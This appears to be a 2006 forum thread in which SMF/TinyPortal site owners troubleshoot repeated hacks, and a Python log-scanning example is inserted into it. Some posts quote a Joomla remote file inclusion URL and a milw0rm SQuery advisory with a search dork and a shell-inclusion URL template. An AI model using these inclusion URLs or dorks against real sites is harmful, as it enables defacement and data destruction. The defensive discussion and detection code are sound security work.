For all of you that don't know http://gfxindia.com was hacked by someone....
I'm just getting server not found from the link.
Screenshot I saw - Bad Language warning...
(http://img148.imageshack.us/my.php?image=gfxoe3.png)
Deadly red warning. :smiley6600:
What's the reason the site was hacked?
Can't say, but if he didn't update with the security updates from here, it could be in the ShoutBox.
But it looks different, so it might be that the host itself got hacked and the sites on it.
The redirect goes to http://www.starhack.org/
So does that mean all of us who have shoutboxes installed should remove it?
Isn't it a part of TinyPortal?
You can turn the shoutbox off and on from the TinyPortal/settings
But if you have installed the update pack you don't have to worry about it.
Or if you have installed the rev2 version of TP, that has the latest security updates built in already.
I don't know which version I have installed.
ver .0.8.6. is what it says. Where can I get the updated version?
From the download section here at Tinyportal ;)
The package you installed, if you downloaded it from there within the last two weeks you have the rev2 package, and that is updated with the security patches needed.
But if you have an install older than that, go for the update pack here (http://www.tinyportal.net/smf/index.php?action=tpmod;dl=item111)
Simply upload the files in the package and replace the old ones.
Thanks g6, I think then I have updated patched mod. :)
I am not so sure this was the shoutbox exploit. It seems his index.php file was hacked..it doesn't redirect, it stays on the server.
Yes I think the same, it happened a lot lately with phpbboards, but there the index files were changed, in this case it seems simply overwritten.
I am hacked 3 or 4 times per week, same hackers, same problem: the index.php content is replaced by the hacker.
Version: SMF RC3 with TP 095.
Now, for 3 days, some guy "Guest (194.224.199.52)" from East Europe has been attempting to do something bad. I put a ban on this IP, and the ban trigger says that this banned IP has 800 hits.
It is the same people that did the shoutbox exploit, because I had a similar index when it was hacked through the shoutbox. You have to replace index.php.
So I am pretty sure it is the shoutbox.
Now I have disabled the shoutbox for a time. If the attacks end ... well, I will be very happy and the shoutbox will be disabled forever!
http://www.rctxtremegamez.8m6.net/forum/index.php?topic=13.0
I'm going to host one, and just add replies with your reason and proof.
I hid my shoutbox from guests, might be a better solution than total disable.
Yes Marian, but what if the hacker registers an account?
if u have installed the new version of TP (.95) then the shoutbox issue is already patched in that
if u still have the older version u can just upload the patch and its taken care of
don't have to disable shoutbox or anything :)
I got SMF RC3 with TP 095.
But for now I close my mouth. I am waiting with the shoutbox disabled. If in some days there are no attacks, then it means that the problem is from the ShoutBox. If the attacks continue, well ... I make suicide!
so ur safe and sound :up: as far as tp is concerned
hacking on ur site could be the result of weak server security and it's probably a host issue
also just to let u know, banning by IP is effective but also very harmful because if the person doesn't have a static IP and uses a dynamic IP from their ISP then you could end up blocking all the users who belong to that IP range who may visit your site
Nearly all ISPs use a single IP to identify their users and further IP mapping is done on their end in their server....so externally it shows one IP only
and if u ban it then it's "bye bye everyone else" who may be a customer belonging to that IP range on that ISP
Change your FTP password. Also take a look at your other FTP accounts, if you have any.
First, this is not against TP, I love TP a lot. This is a call for help.
I know, I think that you have a lot more experience than I. So I'll tell you about it:
In the last two hacks on my site, the hacker put into my root folder a file named Admin.php, of 128 kbts, and from this Admin.php the hacker deleted all of my root site. :-\
Do you know of any other case of other people having this kind of problem with a hack?
Does someone know how this guy can put a PHP file into the root of a domain?
The only way someone can place a php file in the root of your domain is:
A) They got either the server root password or your ssh/ftp userid & password and placed it there.
B) You had an unprotected php program (a filemanager for instance) that they got the userid/password for and used it to place it there.
In other words, it was either a server security issue or your own security issue.
There is one more possibility, though much less likely, that an employee of your host provider did it.
Ya, I strongly agree.
I don't see how someone could just hack through TP/SMF to the point of deleting your whole root directory. The odds of that happening are next to nil.
Did you change your FTP password as I suggested?
Yes, I have changed the password for FTP lots of times, to passwords like this:
sample:
Rt5R4Eer54E4Te44tEe
But I have a question:
This bug (Joomla bug) is from another forum system, but in SMF can a hacker do something like this?:
http://www.victimsite.com/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1 &GLOBALS=&mosConfig_absolute_path=http://www.freewebs.com/pablin77/pa.html
Where http://www.freewebs.com/pablin77/pa.html is the hacker's site and the hacker's file (pa.html), with which the hacker replaces the contents of index.php from SMF or another file from SMF.
As Thurnok pointed out, someone must have access to be able to place files or change them. Of course if a hacker is going to redirect your site which file are they going to use? index.html or index.php because that is the default display file. You should really talk to your host about this so that maybe they can figure out how they're getting access.
SMF and TP protect against those kind of code executions by adding checks and sessions checks etc. So I don't see it possible with SMF and TP.
Are you running any other scripts on your site? Like a gallery or anything?
Has anyone read through this thread???
It seems to be a rather OLD thread with an OLD question ;)
Quote from: IchBin™ on October 03, 2006, 05:55:59 AM
Are you running any other scripts on your site? Like a gallery or anything?
No IchBin, no other script.
Thank you for your answer. I spoke a lot with the host provider, and he says that my PHP files are the problem because all the other users have no problems on the host, including him, who has his own web site, and nobody has ever been able to delete files.
I am only searching for info. Maybe this host provider lies about it and my PHP files are not insecure; I am just searching for a lot of info to be able to stop the hack attacks. I love this system and cannot change it for another, I only need to stop the hacks.
change hosts seriously
ur host is probably not secure and they don't know it themselves
because if this was a problem with SMF or TP then u would see ALL our sites getting hacked left right and center until SMF and TP ceased to exist
akulion, you are right I think.
Squery 4.5, this is the Key.
Warning with this script for Query Game Servers.
any more details on that?
so we can prevent it happening to us as well
When most people hack a site they use a shell script to get access to SMF, phpBB, vBulletin, MyBB and other forum boards. When finding a host you should always make sure you're going to be secure on a good hosting server. Lots of hosting servers say they're secured when they really ain't; they just want customers and the money. If you have hosting with a live support system, ask the staff working on the live support system whether your server is secured. If they say yeah, double check by finding security scripts on google.com. The most unsecured hosting is free hosting companies.
Quote from: GeofMauser on October 05, 2006, 07:41:11 PM
Squery 4.5, this is the Key.
Warning with this script for Query Game Servers.
I asked you if you were running other scripts and you said no?
Then what are you saying Squery for?
Quote from: akulion on October 05, 2006, 07:42:47 PM
any more details on that?
so we can prevent it happening to us as well
Squery, the game server query script, version 4.5 or less, has a high security exploit in the folder Lib, and in various PHP files such as "gore.php":
=================================================================
SQuery <= 4.5(libpath) Remote File Inclusion Exploit
=================================================================
Worked On : ALL VERSIONS |
|
Critical Level : Dangerous |
|
Gug Found In : gore.php |
=================================================================
Dork : "SQuery 4.5" |"SQuery 4.0" |"SQuery 3.9" | inurl:"modules.php?name=SQuery"
http://sitename.com/SQuery/lib/gore.php?libpath=http://SHELLURL.COM?
===============================================================================
Discoverd By : SHiKaA
Conatact : SHiKaA-[at]hotmail.com
GreetZ : BlAcK_BiRd Kambaa NANA METO7575 Gendiaaa Saw SnIpEr_Sa Masry OSA FEGLA Kosho-Man 3amer and #ALL MEMBER OF EL SLAM-CITY
=================================================================
# milw0rm.com [2006-07-10]
PS:
And this was my problem; since I deleted Squery, the hackers have stopped attacking for now.
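Added example, not part of the original thread and not code from SMF, TP or SQuery: a small access-log check for the two request shapes quoted above, a parameter whose value is a remote URL (libpath, mosConfig_absolute_path) and a parameter that targets a PHP superglobal (_REQUEST[...], GLOBALS). It assumes Apache/NCSA-style log lines; the sample lines, hosts and IPs are constructed placeholders.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache/NCSA access-log line: client IP, request line, status code.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A parameter whose value is itself a remote URL (libpath=http://...).
REMOTE_VALUE = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)
# A parameter that tries to overwrite a PHP superglobal (_REQUEST[...], GLOBALS).
SUPERGLOBAL = re.compile(
    r"^(?:GLOBALS|_(?:REQUEST|GET|POST|COOKIE|SERVER|FILES|ENV|SESSION))(?:\[|$)"
)

# Constructed sample lines; hosts and IPs are documentation placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Oct/2006:19:02:11 +0000] "GET /SQuery/lib/gore.php'
    '?libpath=http://attacker.invalid/x.txt? HTTP/1.1" 200 5120',
    '203.0.113.7 - - [05/Oct/2006:19:02:40 +0000] "GET /index.php'
    '?_REQUEST[option]=com_content&GLOBALS=&mosConfig_absolute_path='
    'http%3A%2F%2Fattacker.invalid%2Fpa.html HTTP/1.1" 404 210',
    '198.51.100.23 - - [05/Oct/2006:19:03:02 +0000] "GET /forum/index.php'
    '?topic=13.0 HTTP/1.1" 200 18233',
]

def rfi_findings(line):
    """Return (kind, parameter) pairs for one log line, [] if it looks clean."""
    m = LOG_LINE.match(line)
    if not m:
        return []
    findings = []
    # parse_qsl percent-decodes once, so http%3A%2F%2F... is caught as well.
    for name, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        if REMOTE_VALUE.match(value):
            findings.append(("remote-url-param", name))
        if SUPERGLOBAL.match(name):
            findings.append(("superglobal-param", name))
    return findings

def scan(lines):
    """Group findings by client IP as (script path, HTTP status, kind, parameter)."""
    hits = {}
    for line in lines:
        for kind, name in rfi_findings(line):
            m = LOG_LINE.match(line)
            record = (urlsplit(m["target"]).path, int(m["status"]), kind, name)
            hits.setdefault(m["ip"], []).append(record)
    return hits

if __name__ == "__main__":
    for ip, records in scan(SAMPLE_LOG).items():
        for record in records:
            print(ip, *record)
```

A hit with status 200 on a script you did not know was installed is the case to look at first; legitimate redirect parameters (a return URL after login) also match the first rule, so review hits per script.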
Quote from: IchBin™ on October 05, 2006, 07:58:31 PM
Quote from: GeofMauser on October 05, 2006, 07:41:11 PM
Squery 4.5, this is the Key.
Warning with this script for Query Game Servers.
I asked you if you were running other scripts and you said no?
Then what are you saying Squery for?
I forgot that Squery was on my site, IchBin. Last night I was uploading a few folders to my domain, without SMF and TP installed, to see if the hack came in through other points. Then the hacker deleted all my root directory again, and Squery was one of the "test" folders that I was uploading. Then I immediately went to search for info on the web, and Google instantly showed a lot of links about the SQUERY SECURITY problem.
My "hacks" are not that sophisticated and often involve exploitation of old or insecure scripts.
Most of us can avoid such attacks by keeping your scripts up to date, changing your username and passwords often. Basic security is the key in most cases.
A good host who knows how to secure and run a server is also vital.
You should make sure your email at the Squery site is up to date. They have released several fixes for security bugs in that script. They send out emails to everyone when it happens.
I have not received any warning emails (especially for a bugged script that allows destroying all data in domains), and my mail is up to date for the Squery site. But one thing is certain, never again in my life will I use this script. End of the story.
Well I don't know why you didn't receive the emails, because I sure did. Maybe your email provider blocked it as spam or something.